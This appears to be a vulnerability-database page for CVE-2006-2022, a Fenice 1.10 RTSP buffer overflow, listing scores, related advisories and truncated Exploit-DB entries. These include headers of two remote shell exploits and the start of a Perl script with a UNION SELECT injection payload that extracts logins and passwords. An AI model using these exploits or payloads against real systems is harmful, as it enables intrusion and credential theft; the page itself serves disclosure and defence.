CVE-2006-2022
published 2006-04-25CVE-2006-2022: Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url.c) in Fenice 1.10 and earlier allows remote attackers to execute arbitrary code…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
14.67%
96.2th percentile
Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url.c) in Fenice 1.10 and earlier allows remote attackers to execute arbitrary code via a long URL.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ls3 | fenice | <= 1.10 | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
apache2 vulnerabilities
osv·2023-02-01·CVSS 7.5
CVE-2006-20001 apache2 vulnerabilities
apache2 vulnerabilities
It was discovered that the Apache HTTP Server mod_dav module incorrectly
handled certain If: request headers. A remote attacker could possibly use
this issue to cause the server to crash, resulting in a denial of service.
(CVE-2006-20001)
ZeddYu_Lu discovered that the Apache HTTP Server mod_proxy_ajp module
incorrectly interpreted certain HTTP Requests. A remote attacker could
possibly use this issue to perform an HTTP Request Smuggling attack.
(CVE-2022-36760)
Dimas Fariski Setyawan Putra discovered that the Apache HTTP Server
mod_proxy module incorrectly truncated certain response headers. This may
result in later headers not being interpreted by the client.
(CVE-2022-37436)
OSV
apache2 vulnerabilities
osv·2023-01-31·CVSS 7.5
CVE-2006-20001 apache2 vulnerabilities
apache2 vulnerabilities
It was discovered that the Apache HTTP Server mod_dav module did not
properly handle specially crafted request headers. A remote attacker
could possibly use this issue to cause the process to crash, leading
to a denial of service. (CVE-2006-20001)
It was discovered that the Apache HTTP Server mod_proxy_ajp module did not
properly handle certain invalid Transfer-Encoding headers. A remote attacker
could possibly use this issue to perform an HTTP Request Smuggling attack.
(CVE-2022-36760)
GHSA
GHSA-j99q-v2mf-qpg9: Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url
ghsa_unreviewed·2022-05-01
CVE-2006-2022 [HIGH] GHSA-j99q-v2mf-qpg9: Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url
Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url.c) in Fenice 1.10 and earlier allows remote attackers to execute arbitrary code via a long URL.
CISA
Microsoft Word Malformed Object Pointer Vulnerability
cisa·2022-06-08·CVSS 8.8
CVE-2006-2492 [HIGH] CWE-120 Microsoft Word Malformed Object Pointer Vulnerability
Vulnerability: Microsoft Word Malformed Object Pointer Vulnerability
Affected: Microsoft Word
Microsoft Word and Microsoft Works Suites contain a malformed object pointer which allows attackers to execute code.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2006-2492
Remediation Due Date: 2022-06-22
CISA
Apache Struts 1 ActionForm Denial-of-Service Vulnerability
cisa·2022-01-21·CVSS 7.5
CVE-2006-1547 [HIGH] Apache Struts 1 ActionForm Denial-of-Service Vulnerability
Vulnerability: Apache Struts 1 ActionForm Denial-of-Service Vulnerability
Affected: Apache Struts 1
ActionForm in Apache Struts versions before 1.2.9 with BeanUtils 1.7 contains a vulnerability that allows for denial-of-service (DoS).
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2006-1547
Remediation Due Date: 2022-07-21
No detection rules found.
Exploit-DB
Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow
exploitdb·2007-04-29
CVE-2006-2022 Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow
Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow
---
/*
**
** Fedora Core 6 (exec-shield) based
** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: https://www.securityfocus.com/bid/17678
** vendor: http://streaming.polito.it/legacy_server
**
** --
** exploit by "you dong-hun"(Xpl017Elz), .
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** This is a very common standalone daemon remote buffer overflow vulnerability.
** I used the method that I used on my proftpd exploit again to avoid random mapping library.
** And I'm plainning to publish it in Englis
Exploit-DB
Fenice Oms 1.10 - GET Remote Buffer Overflow
exploitdb·2006-04-25
CVE-2006-2022 Fenice Oms 1.10 - GET Remote Buffer Overflow
Fenice Oms 1.10 - GET Remote Buffer Overflow
---
/*
IHS Iran Homeland Security public source code
Fenice - Open Media Streaming Server remote BOF exploit
author : c0d3r "kaveh razavi" [email protected]
package : fenice-1.10.tar.gz and prolly prior versions
workaround : update after patch release
advisory : https://www.securityfocus.com/bid/17678
company address : http://streaming.polito.it/server
timeline :
23 Apr 2006 : vulnerability reported by Luigi Auriemma
25 Sep 2006 : IHS exploit released
exploit features :
1) a global offset
2) reliable metasploit shellcode
3) autoconnect to shell
bad chars : 0x00 0x05 encoder : PexAlphaNum
compiled with gcc under Linux : gcc fenice.c -o fenice
Exploitation Method : linux-gate.so.1
the refrence written by izik could be downloaded from milw0rm.
Exploit-DB
CoreNews 2.0.1 - 'userid' SQL Injection
exploitdb·2006-04-21
CVE-2006-2032 CoreNews 2.0.1 - 'userid' SQL Injection
CoreNews 2.0.1 - 'userid' SQL Injection
---
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=24
#Usage: corenews.pl
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-24\r\n";
print "- CoreNews \r\n";
print "- -> Victim's host ex: www.victim.com\r\n";
print "- -> Path to CoreNews ex: /corenews/\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$cnserver = $ARGV[0];
$cnserver =~ s/(http:\/\/)//eg;
$cnhost = "http://".$cnserver;
$cndir = $ARGV[1];
$cnport = "80";
$cntar = "preview.php?userid=";
$cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,nu
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/fenicex-adv.txthttp://secunia.com/advisories/19770http://securityreason.com/securityalert/794http://www.securityfocus.com/archive/1/431870/100/0/threadedhttp://www.securityfocus.com/archive/1/432002/100/0/threadedhttp://www.securityfocus.com/archive/1/436256/100/0/threadedhttp://www.securityfocus.com/bid/17678http://www.vupen.com/english/advisories/2006/1491https://exchange.xforce.ibmcloud.com/vulnerabilities/26078http://aluigi.altervista.org/adv/fenicex-adv.txthttp://secunia.com/advisories/19770http://securityreason.com/securityalert/794http://www.securityfocus.com/archive/1/431870/100/0/threadedhttp://www.securityfocus.com/archive/1/432002/100/0/threadedhttp://www.securityfocus.com/archive/1/436256/100/0/threadedhttp://www.securityfocus.com/bid/17678http://www.vupen.com/english/advisories/2006/1491https://exchange.xforce.ibmcloud.com/vulnerabilities/26078
2006-04-25
Published